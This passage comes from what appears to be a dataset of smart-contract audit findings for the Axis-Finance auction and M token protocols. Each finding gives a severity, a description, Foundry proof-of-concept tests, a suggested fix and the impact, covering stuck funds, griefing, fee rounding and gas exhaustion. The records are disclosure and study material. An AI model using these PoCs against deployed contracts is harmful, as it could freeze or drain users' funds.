Send refund and payout to the bidder\n //@audit if pfBidder gets blacklisted the settlement is broken\n Transfer.transfer(\n routing.quoteToken, settlement.pfBidder, settlement.pfRefund, false\n );\n\n _sendPayout(settlement.pfBidder, settlement.pfPayout, routing, auctionOutput);\n }\n```\n -Unsold tokens from an FPAM auction will be stuck in the protocol after the auction concludesчmediumчThe `Axis-Finance` protocol allows sellers to create two types of auctions: FPAM & EMPAM. An FPAM auction allows sellers to set a price, and a maxPayout, as well as create a prefunded auction. The seller of an FPAM auction can cancel it while it is still active by calling the cancel function which in turn calls the cancelAuction() function. If the auction is prefunded, and canceled while still active, all remaining funds will be transferred back to the seller. The problem arises if an FPAM prefunded auction is created, not all of the prefunded supply is bought by users, and the auction concludes. There is no way for the `baseTokens` still in the contract to be withdrawn from the protocol, and they will be forever stuck in the `Axis-Finance` protocol. 
As can be seen from the below code snippet cancelAuction() function checks if an auction is concluded, and if it is the function reverts.\\n```\\n function _revertIfLotConcluded(uint96 lotId_) internal view virtual {\\n // Beyond the conclusion time\\n if (lotData[lotId_].conclusion < uint48(block.timestamp)) {\\n revert Auction_MarketNotActive(lotId_);\\n }\\n\\n // Capacity is sold-out, or cancelled\\n if (lotData[lotId_].capacity == 0) revert Auction_MarketNotActive(lotId_);\\n }\\n```\\n\\nGist After following the steps in the above mentioned gist add the following test to the `AuditorTests.t.sol` file\\n```\\nfunction test_FundedPriceAuctionStuckFunds() public {\\n vm.startPrank(alice);\\n Veecode veecode = fixedPriceAuctionModule.VEECODE();\\n Keycode keycode = keycodeFromVeecode(veecode);\\n bytes memory _derivativeParams = \"\";\\n uint96 lotCapacity = 75_000_000_000e18; // this is 75 billion tokens\\n mockBaseToken.mint(alice, lotCapacity);\\n mockBaseToken.approve(address(auctionHouse), type(uint256).max);\\n\\n FixedPriceAuctionModule.FixedPriceParams memory myStruct = FixedPriceAuctionModule.FixedPriceParams({\\n price: uint96(1e18), \\n maxPayoutPercent: uint24(1e5)\\n });\\n\\n Auctioneer.RoutingParams memory routingA = Auctioneer.RoutingParams({\\n auctionType: keycode,\\n baseToken: mockBaseToken,\\n quoteToken: mockQuoteToken,\\n curator: curator,\\n callbacks: ICallback(address(0)),\\n callbackData: abi.encode(\"\"),\\n derivativeType: toKeycode(\"\"),\\n derivativeParams: _derivativeParams,\\n wrapDerivative: false,\\n prefunded: true\\n });\\n\\n Auction.AuctionParams memory paramsA = Auction.AuctionParams({\\n start: 0,\\n duration: 1 days,\\n capacityInQuote: false,\\n capacity: lotCapacity,\\n implParams: abi.encode(myStruct)\\n });\\n\\n string memory infoHashA;\\n auctionHouse.auction(routingA, paramsA, infoHashA); \\n vm.stopPrank();\\n\\n vm.startPrank(bob);\\n uint96 fundingBeforePurchase;\\n uint96 fundingAfterPurchase;\\n 
(,fundingBeforePurchase,,,,,,,) = auctionHouse.lotRouting(0);\\n console2.log(\"Here is the funding normalized before purchase: \", fundingBeforePurchase/1e18);\\n mockQuoteToken.mint(bob, 10_000_000_000e18);\\n mockQuoteToken.approve(address(auctionHouse), type(uint256).max);\\n Router.PurchaseParams memory purchaseParams = Router.PurchaseParams({\\n recipient: bob,\\n referrer: address(0),\\n lotId: 0,\\n amount: 10_000_000_000e18,\\n minAmountOut: 10_000_000_000e18,\\n auctionData: abi.encode(0),\\n permit2Data: \"\"\\n });\\n bytes memory callbackData = \"\";\\n auctionHouse.purchase(purchaseParams, callbackData);\\n (,fundingAfterPurchase,,,,,,,) = auctionHouse.lotRouting(0);\\n console2.log(\"Here is the funding normalized after purchase: \", fundingAfterPurchase/1e18);\\n console2.log(\"Balance of seler of quote tokens: \", mockQuoteToken.balanceOf(alice)/1e18);\\n console2.log(\"Balance of bob in base token: \", mockBaseToken.balanceOf(bob)/1e18);\\n console2.log(\"Balance of auction house in base token: \", mockBaseToken.balanceOf(address(auctionHouse)) /1e18);\\n skip(86401);\\n vm.stopPrank();\\n\\n vm.startPrank(alice);\\n vm.expectRevert(\\n abi.encodeWithSelector(Auction.Auction_MarketNotActive.selector, 0)\\n );\\n auctionHouse.cancel(uint96(0), callbackData);\\n vm.stopPrank();\\n }\\n```\\n\\n```\\nLogs:\\n Here is the funding normalized before purchase: 75000000000\\n Here is the funding normalized after purchase: 65000000000\\n Balance of seler of quote tokens: 10000000000\\n Balance of bob in base token: 10000000000\\n Balance of auction house in base token: 65000000000\\n```\\n\\nTo run the test use: `forge test -vvv --mt test_FundedPriceAuctionStuckFunds`чImplement a function, that allows sellers to withdraw the amount left for a prefunded FPAM auction they have created, once the auction has concluded.чIf a prefunded FPAM auction concludes and there are still tokens, not bought from the users, they will be stuck in the `Axis-Finance` 
protocol.ч```\\n function _revertIfLotConcluded(uint96 lotId_) internal view virtual {\\n // Beyond the conclusion time\\n if (lotData[lotId_].conclusion < uint48(block.timestamp)) {\\n revert Auction_MarketNotActive(lotId_);\\n }\\n\\n // Capacity is sold-out, or cancelled\\n if (lotData[lotId_].capacity == 0) revert Auction_MarketNotActive(lotId_);\\n }\\n```\\n -User's can be grieved by not submitting the private keyчmediumчUser's can be grieved by not submitting the private key\\nBids cannot be refunded once the auction concludes. And bids cannot be claimed until the auction has been settled. Similarly a EMPAM auction cannot be cancelled once started.\\n```\\n function claimBids(\\n uint96 lotId_,\\n uint64[] calldata bidIds_\\n )\\n external\\n override\\n onlyInternal\\n returns (BidClaim[] memory bidClaims, bytes memory auctionOutput)\\n {\\n // Standard validation\\n _revertIfLotInvalid(lotId_);\\n _revertIfLotNotSettled(lotId_);\\n```\\n\\n```\\n function refundBid(\\n uint96 lotId_,\\n uint64 bidId_,\\n address caller_\\n ) external override onlyInternal returns (uint96 refund) {\\n // Standard validation\\n _revertIfLotInvalid(lotId_);\\n _revertIfBeforeLotStart(lotId_);\\n _revertIfBidInvalid(lotId_, bidId_);\\n _revertIfNotBidOwner(lotId_, bidId_, caller_);\\n _revertIfBidClaimed(lotId_, bidId_);\\n _revertIfLotConcluded(lotId_);\\n```\\n\\n```\\n function _cancelAuction(uint96 lotId_) internal override {\\n // Validation\\n // Batch auctions cannot be cancelled once started, otherwise the seller could cancel the auction after bids have been submitted\\n _revertIfLotActive(lotId_);\\n```\\n\\n```\\n function cancelAuction(uint96 lotId_) external override onlyInternal {\\n // Validation\\n _revertIfLotInvalid(lotId_);\\n _revertIfLotConcluded(lotId_);\\n```\\n\\n```\\n function _settle(uint96 lotId_)\\n internal\\n override\\n returns (Settlement memory settlement_, bytes memory auctionOutput_)\\n {\\n // Settle the auction\\n // Check that auction is 
in the right state for settlement\n if (auctionData[lotId_].status != Auction.Status.Decrypted) {\n revert Auction_WrongState(lotId_);\n }\n```\n\nFor EMPAM auctions, the private key associated with the auction has to be submitted before the auction can be settled. In auctions where the private key is held by the seller, they can grief the bidders, or in cases where a key management solution is used, both sellers and bidders can be griefed by not submitting the private key.чAcknowledge the risk involved for the seller and bidderчUsers will not be able to claim their assets in case the private key holder doesn't submit the key for decryptionч```\n function claimBids(\n uint96 lotId_,\n uint64[] calldata bidIds_\n )\n external\n override\n onlyInternal\n returns (BidClaim[] memory bidClaims, bytes memory auctionOutput)\n {\n // Standard validation\n _revertIfLotInvalid(lotId_);\n _revertIfLotNotSettled(lotId_);\n```\n -Bidder's payout claim could fail due to validation checks in LinearVestingчmediumчBidder's payout claim will fail due to validation checks in LinearVesting after the expiry timestamp\nBidders' payouts are sent by internally calling the `_sendPayout` function. 
In case the payout is a derivative which has already expired, this will revert due to the validation check of `block.timestmap < expiry` present in the mint function of LinearVesting derivative\\n```\\n function _sendPayout(\\n address recipient_,\\n uint256 payoutAmount_,\\n Routing memory routingParams_,\\n bytes memory\\n ) internal {\\n \\n if (fromVeecode(derivativeReference) == bytes7(\"\")) {\\n Transfer.transfer(baseToken, recipient_, payoutAmount_, true);\\n }\\n else {\\n \\n DerivativeModule module = DerivativeModule(_getModuleIfInstalled(derivativeReference));\\n\\n Transfer.approve(baseToken, address(module), payoutAmount_);\\n\\n=> module.mint(\\n recipient_,\\n address(baseToken),\\n routingParams_.derivativeParams,\\n payoutAmount_,\\n routingParams_.wrapDerivative\\n );\\n```\\n\\n```\\n function mint(\\n address to_,\\n address underlyingToken_,\\n bytes memory params_,\\n uint256 amount_,\\n bool wrapped_\\n )\\n external\\n virtual\\n override\\n returns (uint256 tokenId_, address wrappedAddress_, uint256 amountCreated_)\\n {\\n if (amount_ == 0) revert InvalidParams();\\n\\n VestingParams memory params = _decodeVestingParams(params_);\\n\\n if (_validate(underlyingToken_, params) == false) {\\n revert InvalidParams();\\n }\\n```\\n\\n```\\n function _validate(\\n address underlyingToken_,\\n VestingParams memory data_\\n ) internal view returns (bool) {\\n \\n // rest of code.\\n\\n=> if (data_.expiry < block.timestamp) return false;\\n\\n\\n // Check that the underlying token is not 0\\n if (underlyingToken_ == address(0)) return false;\\n\\n\\n return true;\\n }\\n```\\n\\nHence the user's won't be able to claim their payouts of an auction once the derivative has expired. 
For EMPAM auctions, a seller can also wait till this timestmap passes before revealing their private key which will disallow bidders from claiming their rewards.чAllow to mint tokens even after expiry of the vesting token / deploy the derivative token first itself and when making the payout, transfer the base token directly incase the expiry time is passedчBidder's won't be able claim payouts from auction after the derivative expiry timestampч```\\n function _sendPayout(\\n address recipient_,\\n uint256 payoutAmount_,\\n Routing memory routingParams_,\\n bytes memory\\n ) internal {\\n \\n if (fromVeecode(derivativeReference) == bytes7(\"\")) {\\n Transfer.transfer(baseToken, recipient_, payoutAmount_, true);\\n }\\n else {\\n \\n DerivativeModule module = DerivativeModule(_getModuleIfInstalled(derivativeReference));\\n\\n Transfer.approve(baseToken, address(module), payoutAmount_);\\n\\n=> module.mint(\\n recipient_,\\n address(baseToken),\\n routingParams_.derivativeParams,\\n payoutAmount_,\\n routingParams_.wrapDerivative\\n );\\n```\\n -Inaccurate value is used for partial fill quote amount when calculating feesчmediumчInaccurate value is used for partial fill quote amount when calculating fees which can cause reward claiming / payment withdrawal to revert\\nThe fees of an auction is managed as follows:\\nWhenever a bidder claims their payout, calculate the amount of quote tokens that should be collected as fees (instead of giving the entire quote amount to the seller) and add this to the protocol / referrers rewards\\n```\\n function claimBids(uint96 lotId_, uint64[] calldata bidIds_) external override nonReentrant {\\n \\n // rest of code.\\n\\n for (uint256 i = 0; i < bidClaimsLen; i++) {\\n Auction.BidClaim memory bidClaim = bidClaims[i];\\n\\n if (bidClaim.payout > 0) {\\n \\n=> _allocateQuoteFees(\\n protocolFee,\\n referrerFee,\\n bidClaim.referrer,\\n routing.seller,\\n routing.quoteToken,\\n=> bidClaim.paid\\n );\\n```\\n\\nHere bidClaim.paid is the 
amount of quote tokens that was transferred in by the bidder for the purchase\\n```\\n function _allocateQuoteFees(\\n uint96 protocolFee_,\\n uint96 referrerFee_,\\n address referrer_,\\n address seller_,\\n ERC20 quoteToken_,\\n uint96 amount_\\n ) internal returns (uint96 totalFees) {\\n // Calculate fees for purchase\\n (uint96 toReferrer, uint96 toProtocol) = calculateQuoteFees(\\n protocolFee_, referrerFee_, referrer_ != address(0) && referrer_ != seller_, amount_\\n );\\n\\n // Update fee balances if non-zero\\n if (toReferrer > 0) rewards[referrer_][quoteToken_] += uint256(toReferrer);\\n if (toProtocol > 0) rewards[_protocol][quoteToken_] += uint256(toProtocol);\\n\\n\\n return toReferrer + toProtocol;\\n }\\n```\\n\\nWhenever the seller calls claimProceeds to withdraw the amount of quote tokens received from the auction, subtract the quote fees and give out the remaining\\n```\\n function claimProceeds(\\n uint96 lotId_,\\n bytes calldata callbackData_\\n ) external override nonReentrant {\\n \\n // rest of code.\\n \\n uint96 totalInLessFees;\\n {\\n=> (, uint96 toProtocol) = calculateQuoteFees(\\n lotFees[lotId_].protocolFee, lotFees[lotId_].referrerFee, false, purchased_\\n );\\n unchecked {\\n=> totalInLessFees = purchased_ - toProtocol;\\n }\\n }\\n```\\n\\nHere purchased is the total quote token amount that was collected for this auction.\\nIn case the fees calculated in claimProceeds is less than the sum of fees allocated to the protocol / referrer via claimBids, there will be a mismatch causing the sum of (fees allocated + seller purchased quote tokens) to be greater than the total quote token amount that was transferred in for the auction. 
This could cause either the protocol/referrer to not obtain their rewards or the seller to not be able to claim the purchased tokens in case there are no excess quote token present in the auction house contract.\\nIn case, totalPurchased is >= sum of all individual bid quote token amounts (as it is supposed to be), the fee allocation would be correct. But due to the inaccurate computation of the input quote token amount associated with a partial fill, it is possible for the above scenario (ie. fees calculated in claimProceeds is less than the sum of fees allocated to the protocol / referrer via claimBids) to occur\\n```\\n function settle(uint96 lotId_) external override nonReentrant {\\n \\n // rest of code.\\n\\n if (settlement.pfBidder != address(0)) {\\n\\n _allocateQuoteFees(\\n feeData.protocolFee,\\n feeData.referrerFee,\\n settlement.pfReferrer,\\n routing.seller,\\n routing.quoteToken,\\n\\n // @audit this method of calculating the input quote token amount associated with a partial fill is not accurate\\n uint96(\\n=> Math.mulDivDown(\\n settlement.pfPayout, settlement.totalIn, settlement.totalOut\\n )\\n )\\n```\\n\\nThe above method of calculating the input token amount associated with a partial fill can cause this value to be higher than the acutal value and hence the fees allocated will be less than what the fees that will be captured from the seller will be\\nPOC\\nApply the following diff to `test/AuctionHouse/AuctionHouseTest.sol` and run `forge test --mt testHash_SpecificPartialRounding -vv`\\nIt is asserted that the tokens allocated as fees is greater than the tokens that will be captured from a seller for fees\\n```\\ndiff --git a/moonraker/test/AuctionHouse/AuctionHouseTest.sol b/moonraker/test/AuctionHouse/AuctionHouseTest.sol\\nindex 44e717d..9b32834 100644\\n--- a/moonraker/test/AuctionHouse/AuctionHouseTest.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/moonraker/test/AuctionHouse/AuctionHouseTest.sol\\n@@ 
-6,6 // Add the line below\\n6,8 @@ import {Test} from \"forge-std/Test.sol\";\\n import {ERC20} from \"solmate/tokens/ERC20.sol\";\\n import {Transfer} from \"src/lib/Transfer.sol\";\\n import {FixedPointMathLib} from \"solmate/utils/FixedPointMathLib.sol\";\\n// Add the line below\\nimport {SafeCastLib} from \"solmate/utils/SafeCastLib.sol\";\\n// Add the line below\\n\\n \\n // Mocks\\n import {MockAtomicAuctionModule} from \"test/modules/Auction/MockAtomicAuctionModule.sol\";\\n@@ -134,6 // Add the line below\\n136,158 @@ abstract contract AuctionHouseTest is Test, Permit2User {\\n _bidder = vm.addr(_bidderKey);\\n }\\n \\n// Add the line below\\n function testHash_SpecificPartialRounding() public {\\n// Add the line below\\n /*\\n// Add the line below\\n capacity 1056499719758481066\\n// Add the line below\\n previous total amount 1000000000000000000\\n// Add the line below\\n bid amount 2999999999999999999997\\n// Add the line below\\n price 2556460687578254783645\\n// Add the line below\\n fullFill 1173497411705521567\\n// Add the line below\\n excess 117388857750942341\\n// Add the line below\\n pfPayout 1056108553954579226\\n// Add the line below\\n pfRefund 300100000000000000633\\n// Add the line below\\n new totalAmountIn 2700899999999999999364\\n// Add the line below\\n usedContributionForQuoteFees 2699900000000000000698\\n// Add the line below\\n quoteTokens1 1000000\\n// Add the line below\\n quoteTokens2 2699900000\\n// Add the line below\\n quoteTokensAllocated 2700899999\\n// Add the line below\\n */\\n// Add the line below\\n\\n// Add the line below\\n uint bidAmount = 2999999999999999999997;\\n// Add the line below\\n uint marginalPrice = 2556460687578254783645;\\n// Add the line below\\n uint capacity = 1056499719758481066;\\n// Add the line below\\n uint previousTotalAmount = 1000000000000000000;\\n// Add the line below\\n uint baseScale = 1e18;\\n// Add the line below\\n\\n// Add the line below\\n // hasn't reached the capacity with 
previousTotalAmount\\n// Add the line below\\n assert(\\n// Add the line below\\n FixedPointMathLib.mulDivDown(previousTotalAmount, baseScale, marginalPrice) <\\n// Add the line below\\n capacity\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n uint capacityExpended = FixedPointMathLib.mulDivDown(\\n// Add the line below\\n previousTotalAmount // Add the line below\\n bidAmount,\\n// Add the line below\\n baseScale,\\n// Add the line below\\n marginalPrice\\n// Add the line below\\n );\\n// Add the line below\\n assert(capacityExpended > capacity);\\n// Add the line below\\n\\n// Add the line below\\n uint totalAmountIn = previousTotalAmount // Add the line below\\n bidAmount;\\n// Add the line below\\n\\n// Add the line below\\n uint256 fullFill = FixedPointMathLib.mulDivDown(\\n// Add the line below\\n uint256(bidAmount),\\n// Add the line below\\n baseScale,\\n// Add the line below\\n marginalPrice\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n uint256 excess = capacityExpended - capacity;\\n// Add the line below\\n\\n// Add the line below\\n uint pfPayout = SafeCastLib.safeCastTo96(fullFill - excess);\\n// Add the line below\\n uint pfRefund = SafeCastLib.safeCastTo96(\\n// Add the line below\\n FixedPointMathLib.mulDivDown(uint256(bidAmount), excess, fullFill)\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n totalAmountIn -= pfRefund;\\n// Add the line below\\n\\n// Add the line below\\n uint usedContributionForQuoteFees;\\n// Add the line below\\n {\\n// Add the line below\\n uint totalOut = SafeCastLib.safeCastTo96(\\n// Add the line below\\n capacityExpended > capacity ? 
capacity : capacityExpended\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n usedContributionForQuoteFees = FixedPointMathLib.mulDivDown(\\n// Add the line below\\n pfPayout,\\n// Add the line below\\n totalAmountIn,\\n// Add the line below\\n totalOut\\n// Add the line below\\n );\\n// Add the line below\\n }\\n// Add the line below\\n\\n// Add the line below\\n {\\n// Add the line below\\n uint actualContribution = bidAmount - pfRefund;\\n// Add the line below\\n\\n// Add the line below\\n // acutal contribution is less than the usedContributionForQuoteFees\\n// Add the line below\\n assert(actualContribution < usedContributionForQuoteFees);\\n// Add the line below\\n console2.log(\"actual contribution\", actualContribution);\\n// Add the line below\\n console2.log(\\n// Add the line below\\n \"used contribution for fees\",\\n// Add the line below\\n usedContributionForQuoteFees\\n// Add the line below\\n );\\n// Add the line below\\n }\\n// Add the line below\\n\\n// Add the line below\\n // calculating quote fees allocation\\n// Add the line below\\n // quote fees captured from the seller\\n// Add the line below\\n {\\n// Add the line below\\n (, uint96 quoteTokensAllocated) = calculateQuoteFees(\\n// Add the line below\\n 1e3,\\n// Add the line below\\n 0,\\n// Add the line below\\n false,\\n// Add the line below\\n SafeCastLib.safeCastTo96(totalAmountIn)\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n // quote tokens that will be allocated for the earlier bid\\n// Add the line below\\n (, uint96 quoteTokens1) = calculateQuoteFees(\\n// Add the line below\\n 1e3,\\n// Add the line below\\n 0,\\n// Add the line below\\n false,\\n// Add the line below\\n SafeCastLib.safeCastTo96(previousTotalAmount)\\n// Add the line below\\n );\\n// Add the line below\\n\\n// Add the line below\\n // quote tokens that will be allocated for the partial fill\\n// Add the line below\\n (, uint96 quoteTokens2) = 
calculateQuoteFees(\\n// Add the line below\\n 1e3,\\n// Add the line below\\n 0,\\n// Add the line below\\n false,\\n// Add the line below\\n SafeCastLib.safeCastTo96(usedContributionForQuoteFees)\\n// Add the line below\\n );\\n// Add the line below\\n \\n// Add the line below\\n console2.log(\"quoteTokens1\", quoteTokens1);\\n// Add the line below\\n console2.log(\"quoteTokens2\", quoteTokens2);\\n// Add the line below\\n console2.log(\"quoteTokensAllocated\", quoteTokensAllocated);\\n// Add the line below\\n\\n// Add the line below\\n // quoteToken fees allocated is greater than what will be captured from seller\\n// Add the line below\\n assert(quoteTokens1 // Add the line below\\n quoteTokens2 > quoteTokensAllocated);\\n// Add the line below\\n }\\n// Add the line below\\n }\\n// Add the line below\\n\\n// Add the line below\\n function calculateQuoteFees(\\n// Add the line below\\n uint96 protocolFee_,\\n// Add the line below\\n uint96 referrerFee_,\\n// Add the line below\\n bool hasReferrer_,\\n// Add the line below\\n uint96 amount_\\n// Add the line below\\n ) public pure returns (uint96 toReferrer, uint96 toProtocol) {\\n// Add the line below\\n uint _FEE_DECIMALS = 5;\\n// Add the line below\\n uint96 feeDecimals = uint96(_FEE_DECIMALS);\\n// Add the line below\\n\\n// Add the line below\\n if (hasReferrer_) {\\n// Add the line below\\n // In this case we need to:\\n// Add the line below\\n // 1. Calculate referrer fee\\n// Add the line below\\n // 2. 
Calculate protocol fee as the total expected fee amount minus the referrer fee\\n// Add the line below\\n // to avoid issues with rounding from separate fee calculations\\n// Add the line below\\n toReferrer = uint96(\\n// Add the line below\\n FixedPointMathLib.mulDivDown(amount_, referrerFee_, feeDecimals)\\n// Add the line below\\n );\\n// Add the line below\\n toProtocol =\\n// Add the line below\\n uint96(\\n// Add the line below\\n FixedPointMathLib.mulDivDown(\\n// Add the line below\\n amount_,\\n// Add the line below\\n protocolFee_ // Add the line below\\n referrerFee_,\\n// Add the line below\\n feeDecimals\\n// Add the line below\\n )\\n// Add the line below\\n ) -\\n// Add the line below\\n toReferrer;\\n// Add the line below\\n } else {\\n// Add the line below\\n // If there is no referrer, the protocol gets the entire fee\\n// Add the line below\\n toProtocol = uint96(\\n// Add the line below\\n FixedPointMathLib.mulDivDown(\\n// Add the line below\\n amount_,\\n// Add the line below\\n protocolFee_ // Add the line below\\n referrerFee_,\\n// Add the line below\\n feeDecimals\\n// Add the line below\\n )\\n// Add the line below\\n );\\n// Add the line below\\n }\\n// Add the line below\\n }\\n// Add the line below\\n\\n// Add the line below\\n\\n // ===== Helper Functions ===== //\\n \\n function _mulDivUp(uint96 mul1_, uint96 mul2_, uint96 div_) internal pure returns (uint96) {\\n```\\nчUse `bidAmount - pfRefund` as the quote token input amount value instead of computing the current wayчRewards might not be collectible or seller might not be able to claim the proceeds due to lack of tokensч```\\n function claimBids(uint96 lotId_, uint64[] calldata bidIds_) external override nonReentrant {\\n \\n // rest of code.\\n\\n for (uint256 i = 0; i < bidClaimsLen; i++) {\\n Auction.BidClaim memory bidClaim = bidClaims[i];\\n\\n if (bidClaim.payout > 0) {\\n \\n=> _allocateQuoteFees(\\n protocolFee,\\n referrerFee,\\n bidClaim.referrer,\\n routing.seller,\\n 
routing.quoteToken,\\n=> bidClaim.paid\\n );\\n```\\n -Settlement of batch auction can exceed the gas limitчmediumчSettlement of batch auction can exceed the gas limit, making it impossible to settle the auction.\\nWhen a batch auction (EMPAM) is settled, to calculate the lot marginal price, the contract iterates over all bids until the capacity is reached or a bid below the minimum price is found.\\nAs some of the operations performed in the loop are gas-intensive, the contract may run out of gas if the number of bids is too high.\\nNote that additionally, there is another loop in the `_settle` function that iterates over all the remaining bids to delete them from the queue. While this loop consumes much less gas per iteration and would require the number of bids to be much higher to run out of gas, it adds to the problem.\\nChange the minimum bid percent to 0.1% in the `EmpaModuleTest` contract in `EMPAModuleTest.sol`.\\n```\\n// Remove the line below\\n uint24 internal constant _MIN_BID_PERCENT = 1000; // 1%\\n// Add the line below\\n uint24 internal constant _MIN_BID_PERCENT = 100; // 0.1%\\n```\\n\\nAdd the following code to the contract `EmpaModuleSettleTest` in `settle.t.sol` and run `forge test --mt test_settleOog`.\\n```\\nmodifier givenBidsCreated() {\\n uint96 amountOut = 0.01e18;\\n uint96 amountIn = 0.01e18;\\n uint256 numBids = 580;\\n\\n for (uint256 i = 0; i < numBids; i++) {\\n _createBid(_BIDDER, amountIn, amountOut);\\n }\\n \\n _;\\n}\\n\\nfunction test_settleOog() external\\n givenLotIsCreated\\n givenLotHasStarted\\n givenBidsCreated\\n givenLotHasConcluded\\n givenPrivateKeyIsSubmitted\\n givenLotIsDecrypted\\n{ \\n uint256 gasBefore = gasleft();\\n _settle();\\n\\n assert(gasBefore - gasleft() > 30_000_000);\\n}\\n```\\nчAn easy way to tackle the issue would be to change the `_MIN_BID_PERCENT` value from 10 (0.01%) to 1000 (1%) in the `EMPAM.sol` contract, which would limit the number of iterations to 100.\\nA more appropriate solution, if 
it is not acceptable to increase the min bid percent, would be to change the settlement logic so that can be handled in batches of bids to avoid running out of gas.\\nIn both cases, it would also be recommended to limit the number of decrypted bids that can be deleted from the queue in a single transaction.чSettlement of batch auction will revert, causing sellers and bidders to lose their funds.ч```\\n// Remove the line below\\n uint24 internal constant _MIN_BID_PERCENT = 1000; // 1%\\n// Add the line below\\n uint24 internal constant _MIN_BID_PERCENT = 100; // 0.1%\\n```\\n -An earner can still continue earning even after being removed from the approved list.чmediumчAn earner can still continue earning even after being removed from the approved list.\\nA `M` holder is eligible to earn the `Earner Rate` when they are approved by TTG. The approved `M` holder can call `startEarning()` then begin to earn the `Earner Rate`. They also can `stopEarning()` to quit earning.\\nHowever, when an approved `M` holder is disapproved, only the disapproved holder themselves can choose to stop earning; no one else has the authority to force them to quit earning.\\n`Earner Rate` is calculated in `StableEarnerRateModel#rate()` as below:\\n```\\n function rate() external view returns (uint256) {\\n uint256 safeEarnerRate_ = getSafeEarnerRate(\\n IMinterGateway(minterGateway).totalActiveOwedM(),\\n IMToken(mToken).totalEarningSupply(),\\n IMinterGateway(minterGateway).minterRate()\\n );\\n\\n return UIntMath.min256(maxRate(), (RATE_MULTIPLIER * safeEarnerRate_) / ONE);\\n }\\n\\n function getSafeEarnerRate(\\n uint240 totalActiveOwedM_,\\n uint240 totalEarningSupply_,\\n uint32 minterRate_\\n ) public pure returns (uint32) {\\n // solhint-disable max-line-length\\n // When `totalActiveOwedM_ >= totalEarningSupply_`, it is possible for the earner rate to be higher than the\\n // minter rate and still ensure cashflow safety over some period of time (`RATE_CONFIDENCE_INTERVAL`). 
To ensure\\n // cashflow safety, we start with `cashFlowOfActiveOwedM >= cashFlowOfEarningSupply` over some time `dt`.\\n // Effectively: p1 * (exp(rate1 * dt) - 1) >= p2 * (exp(rate2 * dt) - 1)\\n // So: rate2 <= ln(1 + (p1 * (exp(rate1 * dt) - 1)) / p2) / dt\\n // 1. totalActive * (delta_minterIndex - 1) >= totalEarning * (delta_earnerIndex - 1)\\n // 2. totalActive * (delta_minterIndex - 1) / totalEarning >= delta_earnerIndex - 1\\n // 3. 1 + (totalActive * (delta_minterIndex - 1) / totalEarning) >= delta_earnerIndex\\n // Substitute `delta_earnerIndex` with `exponent((earnerRate * dt) / SECONDS_PER_YEAR)`:\\n // 4. 1 + (totalActive * (delta_minterIndex - 1) / totalEarning) >= exponent((earnerRate * dt) / SECONDS_PER_YEAR)\\n // 5. ln(1 + (totalActive * (delta_minterIndex - 1) / totalEarning)) >= (earnerRate * dt) / SECONDS_PER_YEAR\\n // 6. ln(1 + (totalActive * (delta_minterIndex - 1) / totalEarning)) * SECONDS_PER_YEAR / dt >= earnerRate\\n\\n // When `totalActiveOwedM_ < totalEarningSupply_`, the instantaneous earner cash flow must be less than the\\n // instantaneous minter cash flow. To ensure instantaneous cashflow safety, we we use the derivatives of the\\n // previous starting inequality, and substitute `dt = 0`.\\n // Effectively: p1 * rate1 >= p2 * rate2\\n // So: rate2 <= p1 * rate1 / p2\\n // 1. totalActive * minterRate >= totalEarning * earnerRate\\n // 2. 
totalActive * minterRate / totalEarning >= earnerRate\\n // solhint-enable max-line-length\\n\\n if (totalActiveOwedM_ == 0) return 0;\\n\\n if (totalEarningSupply_ == 0) return type(uint32).max;\\n\\n if (totalActiveOwedM_ <= totalEarningSupply_) {//@audit-info rate is slashed\\n // NOTE: `totalActiveOwedM_ * minterRate_` can revert due to overflow, so in some distant future, a new\\n // rate model contract may be needed that handles this differently.\\n return uint32((uint256(totalActiveOwedM_) * minterRate_) / totalEarningSupply_);\\n }\\n\\n uint48 deltaMinterIndex_ = ContinuousIndexingMath.getContinuousIndex(\\n ContinuousIndexingMath.convertFromBasisPoints(minterRate_),\\n RATE_CONFIDENCE_INTERVAL\\n );//@audit-info deltaMinterIndex for 30 days\\n\\n // NOTE: `totalActiveOwedM_ * deltaMinterIndex_` can revert due to overflow, so in some distant future, a new\\n // rate model contract may be needed that handles this differently.\\n int256 lnArg_ = int256(\\n _EXP_SCALED_ONE +\\n ((uint256(totalActiveOwedM_) * (deltaMinterIndex_ - _EXP_SCALED_ONE)) / totalEarningSupply_)\\n );\\n\\n int256 lnResult_ = wadLn(lnArg_ * _WAD_TO_EXP_SCALER) / _WAD_TO_EXP_SCALER;\\n\\n uint256 expRate_ = (uint256(lnResult_) * ContinuousIndexingMath.SECONDS_PER_YEAR) / RATE_CONFIDENCE_INTERVAL;\\n\\n if (expRate_ > type(uint64).max) return type(uint32).max;\\n\\n // NOTE: Do not need to do `UIntMath.safe256` because it is known that `lnResult_` will not be negative.\\n uint40 safeRate_ = ContinuousIndexingMath.convertToBasisPoints(uint64(expRate_));\\n\\n return (safeRate_ > type(uint32).max) ? type(uint32).max : uint32(safeRate_);\\n }\\n```\\n\\nAs we can see, the rate may vary due to the changes in `MToken#totalEarningSupply()`, therefore the earning of fixed principal amount could be decreased if `totalEarningSupply()` increases. 
In some other cases the total earning rewards increases significantly if `totalEarningSupply()` increases, resulting in less `excessOwedM` sending to `ttgVault` when `MinterGateway#updateIndex()` is called.\\nCopy below codes to Integration.t.sol and run `forge test --match-test test_aliceStillEarnAfterDisapproved`\\n```\\n function test_AliceStillEarnAfterDisapproved() external {\\n\\n _registrar.updateConfig(MAX_EARNER_RATE, 40000);\\n _minterGateway.activateMinter(_minters[0]);\\n\\n uint256 collateral = 1_000_000e6;\\n _updateCollateral(_minters[0], collateral);\\n\\n _mintM(_minters[0], 400e6, _bob);\\n _mintM(_minters[0], 400e6, _alice);\\n uint aliceInitialBalance = _mToken.balanceOf(_alice);\\n uint bobInitialBalance = _mToken.balanceOf(_bob);\\n //@audit-info alice and bob had the same M balance\\n assertEq(aliceInitialBalance, bobInitialBalance);\\n //@audit-info alice and bob started earning\\n vm.prank(_alice);\\n _mToken.startEarning();\\n vm.prank(_bob);\\n _mToken.startEarning();\\n\\n vm.warp(block.timestamp + 1 days);\\n uint aliceEarningDay1 = _mToken.balanceOf(_alice) - aliceInitialBalance;\\n uint bobEarningDay1 = 